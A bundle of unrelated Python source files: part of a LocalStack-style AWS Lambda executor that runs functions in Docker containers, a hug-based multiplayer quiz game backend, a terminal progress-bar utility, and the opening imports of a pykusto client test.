return None
def is_java_lambda(lambda_details):
runtime = getattr(lambda_details, 'runtime', lambda_details)
return runtime in [LAMBDA_RUNTIME_JAVA8, LAMBDA_RUNTIME_JAVA11]
def is_nodejs_runtime(lambda_details):
runtime = getattr(lambda_details, 'runtime', lambda_details)
return runtime.startswith('nodejs')
def _store_logs(func_details, log_output, invocation_time=None, container_id=None):
log_group_name = '/aws/lambda/%s' % func_details.name()
container_id = container_id or short_uid()
invocation_time = invocation_time or int(time.time() * 1000)
invocation_time_secs = int(invocation_time / 1000)
time_str = time.strftime('%Y/%m/%d', time.gmtime(invocation_time_secs))
log_stream_name = '%s/[LATEST]%s' % (time_str, container_id)
return store_cloudwatch_logs(log_group_name, log_stream_name, log_output, invocation_time)
def get_main_endpoint_from_container():
global DOCKER_MAIN_CONTAINER_IP
if DOCKER_MAIN_CONTAINER_IP is None:
DOCKER_MAIN_CONTAINER_IP = False
try:
if in_docker():
DOCKER_MAIN_CONTAINER_IP = bootstrap.get_main_container_ip()
LOG.info('Determined main container target IP: %s' % DOCKER_MAIN_CONTAINER_IP)
except Exception as e:
LOG.info('Unable to get IP address of main Docker container "%s": %s' %
(bootstrap.MAIN_CONTAINER_NAME, e))
# return main container IP, or fall back to Docker host (bridge IP, or host DNS address)
return DOCKER_MAIN_CONTAINER_IP or config.DOCKER_HOST_FROM_CONTAINER
class LambdaExecutor(object):
""" Base class for Lambda executors. Subclasses must overwrite the _execute method """
def __init__(self):
# keeps track of each function arn and the last time it was invoked
self.function_invoke_times = {}
def execute(self, func_arn, func_details, event, context=None, version=None,
asynchronous=False, callback=None):
def do_execute(*args):
@cloudwatched('lambda')
def _run(func_arn=None):
# set the invocation time in milliseconds
invocation_time = int(time.time() * 1000)
# start the execution
raised_error = None
result = None
dlq_sent = None
try:
result = self._execute(func_arn, func_details, event, context, version)
except Exception as e:
raised_error = e
if asynchronous:
if get_from_event(event, 'eventSource') == EVENT_SOURCE_SQS:
sqs_queue_arn = get_from_event(event, 'eventSourceARN')
if sqs_queue_arn:
# event source is SQS, send event back to dead letter queue
dlq_sent = sqs_error_to_dead_letter_queue(sqs_queue_arn, event, e)
else:
# event source is not SQS, send back to lambda dead letter queue
lambda_error_to_dead_letter_queue(func_details, event, e)
raise e
finally:
self.function_invoke_times[func_arn] = invocation_time
callback and callback(result, func_arn, event, error=raised_error, dlq_sent=dlq_sent)
# return final result
return result
return _run(func_arn=func_arn)
# Inform users about asynchronous mode of the lambda execution.
if asynchronous:
LOG.debug('Lambda executed in Event (asynchronous) mode, no response will be returned to caller')
FuncThread(do_execute).start()
return None, 'Lambda executed asynchronously.'
return do_execute()
def _execute(self, func_arn, func_details, event, context=None, version=None):
""" This method must be overwritten by subclasses. """
raise Exception('Not implemented.')
def startup(self):
pass
def cleanup(self, arn=None):
pass
def run_lambda_executor(self, cmd, event=None, func_details=None, env_vars={}):
process = run(cmd, asynchronous=True, stderr=subprocess.PIPE, outfile=subprocess.PIPE,
env_vars=env_vars, stdin=True)
result, log_output = process.communicate(input=event)
try:
result = to_str(result).strip()
except Exception:
pass
log_output = to_str(log_output).strip()
return_code = process.returncode
# Note: The user's code may have been logging to stderr, in which case the logs
# will be part of the "result" variable here. Hence, make sure that we extract
# only the *last* line of "result" and consider anything above that as log output.
if isinstance(result, six.string_types) and '\n' in result:
additional_logs, _, result = result.rpartition('\n')
log_output += '\n%s' % additional_logs
log_formatted = log_output.strip().replace('\n', '\n> ')
func_arn = func_details and func_details.arn()
LOG.debug('Lambda %s result / log output:\n%s\n> %s' % (func_arn, result.strip(), log_formatted))
# store log output - TODO get live logs from `process` above?
_store_logs(func_details, log_output)
if return_code != 0:
raise Exception('Lambda process returned error status code: %s. Result: %s. Output:\n%s' %
(return_code, result, log_output))
return result
class ContainerInfo:
"""
Contains basic information about a docker container.
"""
def __init__(self, name, entry_point):
self.name = name
self.entry_point = entry_point
class LambdaExecutorContainers(LambdaExecutor):
""" Abstract executor class for executing Lambda functions in Docker containers """
def prepare_execution(self, func_arn, env_vars, runtime, command, handler, lambda_cwd):
raise Exception('Not implemented')
def _docker_cmd(self):
""" Return the string to be used for running Docker commands. """
return config.DOCKER_CMD
def prepare_event(self, environment, event_body):
""" Return the event as a stdin string. """
# amend the environment variables for execution
environment['AWS_LAMBDA_EVENT_BODY'] = event_body
return None
def _execute(self, func_arn, func_details, event, context=None, version=None):
lambda_cwd = func_details.cwd
runtime = func_details.runtime
handler = func_details.handler
environment = func_details.envvars.copy()
# configure USE_SSL in environment
if config.USE_SSL:
environment['USE_SSL'] = '1'
# prepare event body
if not event:
LOG.warning('Empty event body specified for invocation of Lambda "%s"' % func_arn)
event = {}
event_body = json.dumps(json_safe(event))
stdin = self.prepare_event(environment, event_body)
main_endpoint = get_main_endpoint_from_container()
environment['LOCALSTACK_HOSTNAME'] = main_endpoint
environment['_HANDLER'] = handler
if os.environ.get('HTTP_PROXY'):
environment['HTTP_PROXY'] = os.environ['HTTP_PROXY']
if func_details.timeout:
environment['AWS_LAMBDA_FUNCTION_TIMEOUT'] = str(func_details.timeout)
if context:
environment['AWS_LAMBDA_FUNCTION_NAME'] = context.function_name
environment['AWS_LAMBDA_FUNCTION_VERSION'] = context.function_version
environment['AWS_LAMBDA_FUNCTION_INVOKED_ARN'] = context.invoked_function_arn
if hasattr(context, 'client_context'):
environment['AWS_LAMBDA_CLIENT_CONTEXT'] = json.dumps(context.client_context)
# custom command to execute in the container
command = ''
events_file = ''
# if running a Java Lambda, set up classpath arguments
if is_java_lambda(runtime):
java_opts = Util.get_java_opts()
stdin = None
# copy executor jar into temp directory
target_file = os.path.join(lambda_cwd, os.path.basename(LAMBDA_EXECUTOR_JAR))
if not os.path.exists(target_file):
cp_r(LAMBDA_EXECUTOR_JAR, target_file)
# TODO cleanup once we have custom Java Docker image
taskdir = '/var/task'
events_file = '_lambda.events.%s.json' % short_uid()
save_file(os.path.join(lambda_cwd, events_file), event_body)
classpath = Util.get_java_classpath(target_file)
command = ("bash -c 'cd %s; java %s -cp \"%s\" \"%s\" \"%s\" \"%s\"'" %
(taskdir, java_opts, classpath, LAMBDA_EXECUTOR_CLASS, handler, events_file))
# accept any self-signed certificates for outgoing calls from the Lambda
if is_nodejs_runtime(runtime):
environment['NODE_TLS_REJECT_UNAUTHORIZED'] = '0'
# determine the command to be executed (implemented by subclasses)
cmd = self.prepare_execution(func_arn, environment, runtime, command, handler, lambda_cwd)
# lambci writes the Lambda result to stdout and logs to stderr, fetch it from there!
LOG.info('Running lambda cmd: %s' % cmd)
result = self.run_lambda_executor(cmd, stdin, env_vars=environment, func_details=func_details)
# clean up events file
events_file and os.path.exists(events_file) and rm_rf(events_file)
return result
class LambdaExecutorReuseContainers(LambdaExecutorContainers):
""" Executor class for executing Lambda functions in re-usable Docker containers """
def __init__(self):
super(LambdaExecutorReuseContainers, self).__init__()
# locking thread for creation/destruction of docker containers.
self.docker_container_lock = threading.RLock()
# On each invocation we try to construct a port unlikely to conflict
# with a previously invoked lambda function. This is a problem with at
# least the lambci/lambda:go1.x container, which execs a go program that
# attempts to bind to the same default port.
self.next_port = 0
self.max_port = LAMBDA_SERVER_UNIQUE_PORTS
self.port_offset = LAMBDA_SERVER_PORT_OFFSET
def prepare_execution(self, func_arn, env_vars, runtime, command, handler, lambda_cwd):
# check whether the Lambda has been invoked before
has_been_invoked_before = func_arn in self.function_invoke_times
# Choose a port for this invocation
with self.docker_container_lock:
env_vars['_LAMBDA_SERVER_PORT'] = str(self.next_port + self.port_offset)
self.next_port = (self.next_port + 1) % self.max_port
# create/verify the docker container is running.
LOG.debug('Priming docker container with runtime "%s" and arn "%s".', runtime, func_arn)
container_info = self.prime_docker_container(runtime, func_arn, env_vars.items(), lambda_cwd)
# Note: currently "docker exec" does not support --env-file, i.e., environment variables can only be
# passed directly on the command line, using "-e" below. TODO: Update this code once --env-file is
# available for docker exec, to better support very large Lambda events (very long environment values)
exec_env_vars = ' '.join(['-e {}="${}"'.format(k, k) for (k, v) in env_vars.items()])
if not command:
command = '%s %s' % (container_info.entry_point, handler)
# determine files to be copied into the container
copy_command = ''
docker_cmd = self._docker_cmd()
if not has_been_invoked_before and config.LAMBDA_REMOTE_DOCKER:
# if this is the first invocation: copy the entire folder into the container
copy_command = '%s cp "%s/." "%s:/var/task";' % (docker_cmd, lambda_cwd, container_info.name)
cmd = (
'%s'
' %s exec'
' %s' # env variables
' %s' # container name
' %s' # run cmd
) % (copy_command, docker_cmd, exec_env_vars, container_info.name, command)
LOG.debug('Command for docker-reuse Lambda executor: %s' % cmd)
return cmd
def startup(self):
self.cleanup()
# start a process to remove idle containers
if config.LAMBDA_REMOVE_CONTAINERS:
self.start_idle_container_destroyer_interval()
def cleanup(self, arn=None):
if arn:
self.function_invoke_times.pop(arn, None)
return self.destroy_docker_container(arn)
self.function_invoke_times = {}
return self.destroy_existing_docker_containers()
def prime_docker_container(self, runtime, func_arn, env_vars, lambda_cwd):
"""
Prepares a persistent docker container for a specific function.
:param runtime: Lamda runtime environment. python2.7, nodejs6.10, etc.
:param func_arn: The ARN of the lambda function.
:param env_vars: The environment variables for the lambda.
:param lambda_cwd: The local directory containing the code for the lambda function.
:return: ContainerInfo class containing the container name and default entry point.
"""
with self.docker_container_lock:
# Get the container name and id.
container_name = self.get_container_name(func_arn)
docker_cmd = self._docker_cmd()
status = self.get_docker_container_status(func_arn)
LOG.debug('Priming docker container (status "%s"): %s' % (status, container_name))
docker_image = Util.docker_image_for_runtime(runtime)
rm_flag = Util.get_docker_remove_flag()
# Container is not running or doesn't exist.
if status < 1:
# Make sure the container does not exist in any form/state.
self.destroy_docker_container(func_arn)
env_vars_str = ' '.join(['-e {}={}'.format(k, cmd_quote(v)) for (k, v) in env_vars])
network = config.LAMBDA_DOCKER_NETWORK
network_str = '--network="%s"' % network if network else ''
mount_volume = not config.LAMBDA_REMOTE_DOCKER
lambda_cwd_on_host = Util.get_host_path_for_path_in_docker(lambda_cwd)
if (':' in lambda_cwd and '\\' in lambda_cwd):
lambda_cwd_on_host = Util.format_windows_path(lambda_cwd_on_host)
mount_volume_str = '-v "%s":/var/task' % lambda_cwd_on_host if mount_volume else ''
# Create and start the container
LOG.debug('Creating container: %s' % container_name)
cmd = (
'%s create'
' %s' # --rm flag
' --name "%s"'
' --entrypoint /bin/bash' # Load bash when it starts.
' %s'
' --interactive' # Keeps the container running bash.
' -e AWS_LAMBDA_EVENT_BODY="$AWS_LAMBDA_EVENT_BODY"'
' -e HOSTNAME="$HOSTNAME"'
' -e LOCALSTACK_HOSTNAME="$LOCALSTACK_HOSTNAME"'
' %s' # env_vars
' %s' # network
' %s'
) % (docker_cmd, rm_flag, container_name, mount_volume_str, env_vars_str, network_str, docker_image)
LOG.debug(cmd)
run(cmd)
if not mount_volume:
LOG.debug('Copying files to container "%s" from "%s".' % (container_name, lambda_cwd))
cmd = (
'%s cp'
' "%s/." "%s:/var/task"'
) % (docker_cmd, lambda_cwd, container_name)
LOG.debug(cmd)
run(cmd)
LOG.debug('Starting container: %s' % container_name)
cmd = '%s start %s' % (docker_cmd, container_name)
LOG.debug(cmd)
run(cmd)
# give the container some time to start up
time.sleep(1)
# Get the entry point for the image.
LOG.debug('Getting the entrypoint for image: %s' % (docker_image))
cmd = (
'%s image inspect'
' --format="{{ .ContainerConfig.Entrypoint }}"'
' %s'
) % (docker_cmd, docker_image)
LOG.debug(cmd)
run_result = run(cmd)
entry_point = run_result.strip('[]\n\r ')
container_network = self.get_docker_container_network(func_arn)
LOG.debug('Using entrypoint "%s" for container "%s" on network "%s".'
% (entry_point, container_name, container_network))
return ContainerInfo(container_name, entry_point)
def destroy_docker_container(self, func_arn):
"""
Stops and/or removes a docker container for a specific lambda function ARN.
:param func_arn: The ARN of the lambda function.
:return: None
"""
with self.docker_container_lock:
status = self.get_docker_container_status(func_arn)
docker_cmd = self._docker_cmd()
# Get the container name and id.
container_name = self.get_container_name(func_arn)
if status == 1:
LOG.debug('Stopping container: %s' % container_name)
cmd = (
'%s stop -t0 %s'
) % (docker_cmd, container_name)
LOG.debug(cmd)
run(cmd, asynchronous=False, stderr=subprocess.PIPE, outfile=subprocess.PIPE)
status = self.get_docker_container_status(func_arn)
if status == -1:
LOG.debug('Removing container: %s' % container_name)
cmd = (
'%s rm %s'
) % (docker_cmd, container_name)
LOG.debug(cmd)
run(cmd, asynchronous=False, stderr=subprocess.PIPE, outfile=subprocess.PIPE)
def get_all_container_names(self):
"""
Returns a list of container names for lambda containers.
:return: A String[] localstack docker container names for each function.
"""
with self.docker_container_lock:
LOG.debug('Getting all lambda containers names.')
cmd = '%s ps -a --filter="name=localstack_lambda_*" --format "{{.Names}}"' % self._docker_cmd()
LOG.debug(cmd)
cmd_result = run(cmd, asynchronous=False, stderr=subprocess.PIPE, outfile=subprocess.PIPE).strip()
if len(cmd_result) > 0:
container_names = cmd_result.split('\n')
else:
container_names = []
return container_names
def destroy_existing_docker_containers(self):
"""
Stops and/or removes all lambda docker containers for localstack.
:return: None
"""
with self.docker_container_lock:
container_names = self.get_all_container_names()
LOG.debug('Removing %d containers.' % len(container_names))
for container_name in container_names:
cmd = '%s rm -f %s' % (self._docker_cmd(), container_name)
LOG.debug(cmd)
run(cmd, asynchronous=False, stderr=subprocess.PIPE, outfile=subprocess.PIPE)
def get_docker_container_status(self, func_arn):
"""
Determine the status of a docker container.
:param func_arn: The ARN of the lambda function.
:return: 1 If the container is running,
-1 if the container exists but is not running
0 if the container does not exist.
"""
with self.docker_container_lock:
# Get the container name and id.
container_name = self.get_container_name(func_arn)
# Check if the container is already running
# Note: filtering by *exact* name using regex filter '^...$' seems unstable on some
# systems. Therefore, we use a combination of filter and grep to get the results.
cmd = ("docker ps -a --filter name='%s' "
'--format "{{ .Status }} - {{ .Names }}" '
'| grep -w "%s" | cat') % (container_name, container_name)
LOG.debug('Getting status for container "%s": %s' % (container_name, cmd))
cmd_result = run(cmd)
# If the container doesn't exist. Create and start it.
container_status = cmd_result.strip()
if len(container_status) == 0:
return 0
if container_status.lower().startswith('up '):
return 1
return -1
def get_docker_container_network(self, func_arn):
"""
Determine the network of a docker container.
:param func_arn: The ARN of the lambda function.
:return: name of the container network
"""
with self.docker_container_lock:
status = self.get_docker_container_status(func_arn)
# container does not exist
if status == 0:
return ''
# Get the container name.
container_name = self.get_container_name(func_arn)
docker_cmd = self._docker_cmd()
# Get the container network
LOG.debug('Getting container network: %s' % container_name)
cmd = (
'%s inspect %s'
' --format "{{ .HostConfig.NetworkMode }}"'
) % (docker_cmd, container_name)
LOG.debug(cmd)
cmd_result = run(cmd, asynchronous=False, stderr=subprocess.PIPE, outfile=subprocess.PIPE)
container_network = cmd_result.strip()
return container_network
def idle_container_destroyer(self):
"""
Iterates though all the lambda containers and destroys any container that has
been inactive for longer than MAX_CONTAINER_IDLE_TIME_MS.
:return: None
"""
LOG.info('Checking if there are idle containers.')
current_time = int(time.time() * 1000)
for func_arn, last_run_time in dict(self.function_invoke_times).items():
duration = current_time - last_run_time
# not enough idle time has passed
if duration < MAX_CONTAINER_IDLE_TIME_MS:
continue
# container has been idle, destroy it.
self.destroy_docker_container(func_arn)
def start_idle_container_destroyer_interval(self):
"""
Starts a repeating timer that triggers start_idle_container_destroyer_interval every 60 seconds.
Thus checking for idle containers and destroying them.
:return: None
"""
self.idle_container_destroyer()
threading.Timer(60.0, self.start_idle_container_destroyer_interval).start()
def get_container_name(self, func_arn):
"""
Given a function ARN, returns a valid docker container name.
:param func_arn: The ARN of the lambda function.
:return: A docker compatible name for the arn.
"""
return 'localstack_lambda_' + re.sub(r'[^a-zA-Z0-9_.-]', '_', func_arn)
class LambdaExecutorSeparateContainers(LambdaExecutorContainers):
def __init__(self):
super(LambdaExecutorSeparateContainers, self).__init__()
self.next_port = 1
self.max_port = LAMBDA_API_UNIQUE_PORTS
self.port_offset = LAMBDA_API_PORT_OFFSET
def prepare_event(self, environment, event_body):
# Tell Lambci to use STDIN for the event
environment['DOCKER_LAMBDA_USE_STDIN'] = '1'
return event_body.encode()
def prepare_execution(self, func_arn, env_vars, runtime, command, handler, lambda_cwd):
entrypoint = ''
if command:
entrypoint = ' --entrypoint ""'
else:
command = '"%s"' % handler
# add Docker Lambda env vars
network = config.LAMBDA_DOCKER_NETWORK
network_str = '--network="%s"' % network if network else ''
if network == 'host':
port = str(self.next_port + self.port_offset)
env_vars['DOCKER_LAMBDA_API_PORT'] = port
env_vars['DOCKER_LAMBDA_RUNTIME_PORT'] = port
self.next_port = (self.next_port + 1) % self.max_port
env_vars_string = ' '.join(['-e {}="${}"'.format(k, k) for (k, v) in env_vars.items()])
debug_docker_java_port = '-p {p}:{p}'.format(p=Util.debug_java_port) if Util.debug_java_port else ''
docker_cmd = self._docker_cmd()
docker_image = Util.docker_image_for_runtime(runtime)
rm_flag = Util.get_docker_remove_flag()
if config.LAMBDA_REMOTE_DOCKER:
cmd = (
'CONTAINER_ID="$(%s create -i'
' %s' # entrypoint
' %s' # debug_docker_java_port
' %s' # env
' %s' # network
' %s' # --rm flag
' %s %s' # image and command
')";'
'%s cp "%s/." "$CONTAINER_ID:/var/task"; '
'%s start -ai "$CONTAINER_ID";'
) % (docker_cmd, entrypoint, debug_docker_java_port, env_vars_string, network_str, rm_flag,
docker_image, command,
docker_cmd, lambda_cwd,
docker_cmd)
else:
lambda_cwd_on_host = Util.get_host_path_for_path_in_docker(lambda_cwd)
cmd = (
'%s run -i'
' %s -v "%s":/var/task'
' %s'
' %s' # network
' %s' # --rm flag
' %s %s'
) % (docker_cmd, entrypoint, lambda_cwd_on_host, env_vars_string,
network_str, rm_flag, docker_image, command)
return cmd
class LambdaExecutorLocal(LambdaExecutor):
def _execute(self, func_arn, func_details, event, context=None, version=None):
lambda_cwd = func_details.cwd
environment = func_details.envvars.copy()
# execute the Lambda function in a forked sub-process, sync result via queue
queue = Queue()
lambda_function = func_details.function(version)
def do_execute():
# now we're executing in the child process, safe to change CWD and ENV
if lambda_cwd:
os.chdir(lambda_cwd)
if environment:
os.environ.update(environment)
result = lambda_function(event, context)
queue.put(result)
process = Process(target=do_execute)
with CaptureOutput() as c:
process.run()
result = queue.get()
# Make sure to keep the log line below, to ensure the log stream gets created
log_output = 'START: Lambda %s started via "local" executor ...' % func_arn
# TODO: Interweaving stdout/stderr currently not supported
for stream in (c.stdout(), c.stderr()):
if stream:
log_output += ('\n' if log_output else '') + stream
# store logs to CloudWatch
_store_logs(func_details, log_output)
return result
def execute_java_lambda(self, event, context, main_file, func_details=None):
handler = func_details.handler
opts = config.LAMBDA_JAVA_OPTS if config.LAMBDA_JAVA_OPTS else ''
event_file = EVENT_FILE_PATTERN.replace('*', short_uid())
save_file(event_file, json.dumps(json_safe(event)))
TMP_FILES.append(event_file)
class_name = handler.split('::')[0]
classpath = '%s:%s:%s' % (main_file, Util.get_java_classpath(main_file), LAMBDA_EXECUTOR_JAR)
cmd = 'java %s -cp %s %s %s %s' % (opts, classpath, LAMBDA_EXECUTOR_CLASS, class_name, event_file)
LOG.warning(cmd)
result = self.run_lambda_executor(cmd, func_details=func_details)
return result
class Util:
debug_java_port = False
@classmethod
def get_java_opts(cls):
opts = config.LAMBDA_JAVA_OPTS or ''
# Replace _debug_port_ with a random free port
if '_debug_port_' in opts:
if not cls.debug_java_port:
cls.debug_java_port = get_free_tcp_port()
opts = opts.replace('_debug_port_', ('%s' % cls.debug_java_port))
else:
# Parse the debug port from opts
m = re.match('.*address=(\\d+).*', opts)
if m is not None:
cls.debug_java_port = m.groups()[0]
return opts
@classmethod
def get_host_path_for_path_in_docker(cls, path):
return re.sub(r'^%s/(.*)$' % config.TMP_FOLDER,
r'%s/\1' % config.HOST_TMP_FOLDER, path)
@classmethod
def format_windows_path(cls, path):
temp = path.replace(':', '').replace('\\', '/')
if len(temp) >= 1 and temp[:1] != '/':
temp = '/' + temp
temp = '%s%s' % (config.WINDOWS_DOCKER_MOUNT_PREFIX, temp)
return temp
@classmethod
def docker_image_for_runtime(cls, runtime):
docker_tag = runtime
docker_image = config.LAMBDA_CONTAINER_REGISTRY
# TODO: remove prefix once execution issues are fixed with dotnetcore/python lambdas
# See https://github.com/lambci/docker-lambda/pull/218
lambdas_to_add_prefix = ['dotnetcore2.0', 'dotnetcore2.1', 'python2.7', 'python3.6', 'python3.7']
if docker_image == 'lambci/lambda' and any(img in docker_tag for img in lambdas_to_add_prefix):
docker_tag = '20191117-%s' % docker_tag
return '"%s:%s"' % (docker_image, docker_tag)
@classmethod
def get_docker_remove_flag(cls):
return '--rm' if config.LAMBDA_REMOVE_CONTAINERS else ''
@classmethod
def get_java_classpath(cls, archive):
"""
Return the Java classpath, using the parent folder of the
given archive as the base folder.
The result contains any *.jar files in the base folder, as
well as any JAR files in the "lib/*" subfolder living
alongside the supplied java archive (.jar or .zip).
:param archive: an absolute path to a .jar or .zip Java archive
:return: the Java classpath, relative to the base dir of "archive"
"""
entries = ['.']
base_dir = os.path.dirname(archive)
for pattern in ['%s/*.jar', '%s/lib/*.jar', '%s/java/lib/*.jar', '%s/*.zip']:
for entry in glob.glob(pattern % base_dir):
if os.path.realpath(archive) != os.path.realpath(entry):
entries.append(os.path.relpath(entry, base_dir))
# make sure to append the localstack-utils.jar at the end of the classpath
# https://github.com/localstack/localstack/issues/1160
entries.append(os.path.relpath(archive, base_dir))
entries.append('*.jar')
entries.append('java/lib/*.jar')
result = ':'.join(entries)
return result
# --------------
# GLOBAL STATE
# --------------
EXECUTOR_LOCAL = LambdaExecutorLocal()
EXECUTOR_CONTAINERS_SEPARATE = LambdaExecutorSeparateContainers()
EXECUTOR_CONTAINERS_REUSE = LambdaExecutorReuseContainers()
DEFAULT_EXECUTOR = EXECUTOR_CONTAINERS_SEPARATE
# the keys of AVAILABLE_EXECUTORS map to the LAMBDA_EXECUTOR config variable
AVAILABLE_EXECUTORS = {
'local': EXECUTOR_LOCAL,
'docker': EXECUTOR_CONTAINERS_SEPARATE,
'docker-reuse': EXECUTOR_CONTAINERS_REUSE
}
|
backend.py
|
#!/usr/bin/python3
import json, hug, random, time, threading, operator
with open("questions.json") as f:
questions = json.load(f)
sessions = {}
for question in questions:
questionIDs = list(questions.keys())
#sessions["test"] = {"questionsCount": 0, "questionsRemaining": 0, "players":{"Mork":{"timeOut": 0, "score": 2, "latestScore: 0"},"Mindy":{"timeOut": 0,"score": 0, "latestScore": 0}, "questions": [], "activeQuestionID": "000"}
def score(sessionName, clientName, answer):
if sessions[sessionName]["players"][clientName]["latestScore"] == 0:
if answer == questions[sessions[sessionName]["activeQuestionID"]]["solution"]:
sessions[sessionName]["players"][clientName]["latestScore"] = len([player for player in sessions[sessionName]["players"] if sessions[sessionName]["players"][player]["latestScore"] == 0])
return 0
else:
sessions[sessionName]["players"][clientName]["latestScore"] = -1
return 2
else:
return 1
def heartbeatIncrementor():
while not heartbeedFinal:
for session in sessions:
cleanupList = []
for player in sessions[session]["players"]:
sessions[session]["players"][player]["timeOut"] += 1
if sessions[session]["players"][player]["timeOut"] > 8:
cleanupList.append(player)
for player in cleanupList:
del sessions[session]["players"][player]
time.sleep(5)
heartbeedFinal = False
t = threading.Thread(target=heartbeatIncrementor)
t.start()
# t.cancel()
# API endpoints
@hug.get("/backend/client/new", output=hug.output_format.json)
def clientInit(sessionName, clientName):
if sessionName in sessions:
if clientName in sessions[sessionName]["players"]:
return {"status": 2}
else:
sessions[sessionName]["players"][clientName] = {"timeOut": 0, "score": 0, "latestScore": 0}
return {"status": 0}
else:
return {"status":1}
@hug.get("/backend/client/heartbeat", output=hug.output_format.json)
def heartbeatHelper(sessionName, clientName):
if sessionName in sessions:
if clientName in sessions[sessionName]["players"]:
sessions[sessionName]["players"][clientName]["timeOut"] = 0
return {"status": 0}
else:
return {"status": 2}
else:
return {"status":1}
@hug.get("/backend/question/new", output=hug.output_format.json)
def returnQuestion(sessionName):
if sessionName in sessions:
if sessions[sessionName]["questionsRemaining"] != 0:
sessions[sessionName]["questionsRemaining"] -= 1
sessions[sessionName]["activeQuestionID"] = questionIDs[-1]
currentQuestion = sessions[sessionName]["questionCount"] - sessions[sessionName]["questionsRemaining"]
return {"status": 0, "questionCount":sessions[sessionName]["questionCount"], "currentQuestion": currentQuestion, "question":questions[questionIDs.pop()]}
else:
return {"status": 2}
else:
return {"status":1}
@hug.get("/backend/question/results", output=hug.output_format.json)
def closeQuestion(sessionName):
if sessionName in sessions:
sessions[sessionName]["activeQuestionID"] = "000"
results = []
for player in sessions[sessionName]["players"]:
results.append({"player": player, "result": sessions[sessionName]["players"][player]["latestScore"]})
sessions[sessionName]["players"][player]["score"] += sessions[sessionName]["players"][player]["latestScore"]
sessions[sessionName]["players"][player]["latestScore"] = 0
results.sort(key=operator.itemgetter("result"))
while len(results) < 3:
results.insert(0, {"player": "", "result": -1})
return {"status": 0, "results": results[::-1]}
else:
return {"status": 1}
@hug.get("/backend/client/answer", output=hug.output_format.json)
def answerQuestion(sessionName, clientName, answer:hug.types.number):
if sessionName in sessions:
if clientName in sessions[sessionName]["players"]:
s = score(sessionName, clientName, answer)
if s == 0:
return {"status": 0}
elif s == 2:
return {"status": 4}
else:
return {"status": 3}
else:
return {"status": 2}
else:
return {"status": 1}
@hug.get("/backend/session/new", output=hug.output_format.json)
def sessionInit(sessionName,noquestions:hug.types.number):
if sessionName in sessions:
return {"status": 1}
questionPool = list(questionIDs)
questionList = []
for i in range(noquestions):
if len(questionPool) == 0:
return {"status": 2}
random.shuffle(questionPool)
questionList.append(questionPool.pop())
sessions[sessionName] = {"questionCount": noquestions, "questionsRemaining": noquestions, "players":{}, "questions": questionList, "activeQuestionID": "000"}
return {"status": 0}
@hug.get("/backend/session/playerlist", output=hug.output_format.json)
def playerList(sessionName):
if sessionName in sessions:
return sessions[sessionName]["players"].keys()
return {"status":1}
@hug.get("/backend/session/standings", output=hug.output_format.json)
def scoreboard(sessionName):
if sessionName in sessions:
standings = []
for player in sessions[sessionName]["players"]:
standings.append({"player": player, "score": sessions[sessionName]["players"][player]["score"]})
standings.sort(key=operator.itemgetter("score"))
while len(standings) < 5:
standings.insert(0, {"player": "", "result": -1})
return {"status": 0, "results": standings}
else:
return {"status": 1}
# Static file returns
@hug.get("/10ft/index", output=hug.output_format.html)
@hug.get("/10ft/index.html", output=hug.output_format.html)
@hug.get("/10ft", output=hug.output_format.html)
def staticReturn10ftIndex():
with open("../10ft/index.html") as f:
return f.read()
@hug.get("/10ft/qw.js", output=hug.output_format.text)
def staticReturn10ftJava():
with open("../10ft/qw.js") as f:
return f.read()
@hug.get("/10ft/joining.html", output=hug.output_format.html)
@hug.get("/10ft/joining", output=hug.output_format.html)
def dynamicReturn10ftJoining(sessionName):
with open("../10ft/joining.html") as f:
return f.read().replace("$SESSIONNAME$", sessionName)
@hug.get("/10ft/question.html", output=hug.output_format.html)
@hug.get("/10ft/question", output=hug.output_format.html)
def dynamicReturn10ftQuestion(sessionName):
with open("../10ft/question.html") as f:
return f.read().replace("$SESSIONNAME$", sessionName)
@hug.get("/index", output=hug.output_format.html)
@hug.get("/index.html", output=hug.output_format.html)
@hug.get("/", output=hug.output_format.html)
def staticReturnClientIndex():
with open("../client/index.html") as f:
return f.read()
@hug.get("/qw.js", output=hug.output_format.text)
def staticReturnClientJava():
with open("../client/qw.js") as f:
return f.read()
@hug.get("/play.html", output=hug.output_format.html)
@hug.get("/play", output=hug.output_format.html)
def dynamicReturnClientPlay(sessionName, clientName):
with open("../client/play.html") as f:
return f.read().replace("$SESSIONNAME$", sessionName).replace("$CLIENTNAME$", clientName)
|
progress.py
|
from __future__ import division, absolute_import
import sys
import threading
import time
from timeit import default_timer
def format_time(t):
"""Format seconds into a human readable form.
>>> format_time(10.4)
'10.4s'
>>> format_time(1000.4)
'16min 40.4s'
"""
m, s = divmod(t, 60)
h, m = divmod(m, 60)
if h:
return '{0:2.0f}hr {1:2.0f}min {2:4.1f}s'.format(h, m, s)
elif m:
return '{0:2.0f}min {1:4.1f}s'.format(m, s)
else:
return '{0:4.1f}s'.format(s)
class progressbar(object):
"""A simple progressbar for iterables.
Displays a progress bar showing progress through an iterable.
Parameters
----------
iterable : iterable
The object to iterate over.
width : int, optional
Width of the bar in characters.
enabled : bool, optional
Whether to log progress. Useful for turning off progress reports
without changing your code. Default is True.
file : file, optional
Where to log progress. Default is ``sys.stdout``.
Example
-------
>>> with progressbar(iterable) as itbl: # doctest: +SKIP
... for i in itbl:
... do_stuff(i)
[########################################] | 100% Completed | 5.2 s
"""
def __init__(self, iterable, width=40, enabled=True, file=None):
self._iterable = iterable
self._ndone = 0
self._ntotal = len(iterable)
self._width = width
self._enabled = enabled
self._file = sys.stdout if file is None else file
def __enter__(self):
if self._enabled:
self._start_time = default_timer()
# Start background thread
self._running = True
self._timer = threading.Thread(target=self._timer_func)
self._timer.daemon = True
self._timer.start()
return self
def __exit__(self, type, value, traceback):
if self._enabled:
self._running = False
self._timer.join()
self._update_bar()
self._file.write('\n')
self._file.flush()
def __iter__(self):
for i in self._iterable:
self._ndone += 1
yield i
def _timer_func(self):
while self._running:
self._update_bar()
time.sleep(0.1)
def _update_bar(self):
elapsed = default_timer() - self._start_time
frac = (self._ndone / self._ntotal) if self._ntotal else 1
bar = '#' * int(self._width * frac)
percent = int(100 * frac)
elapsed = format_time(elapsed)
msg = '\r[{0:<{1}}] | {2}% Completed | {3}'.format(bar, self._width,
percent, elapsed)
try:
self._file.write(msg)
self._file.flush()
except ValueError:
pass
|
test_client_fetch.py
|
from threading import Thread, Lock
from typing import Any, Callable, List
from unittest.mock import patch
from pykusto import PyKustoClient, Query
# noinspection PyProtectedMember
from pykusto._src.client_base import Database
# noinspection PyProtectedMember
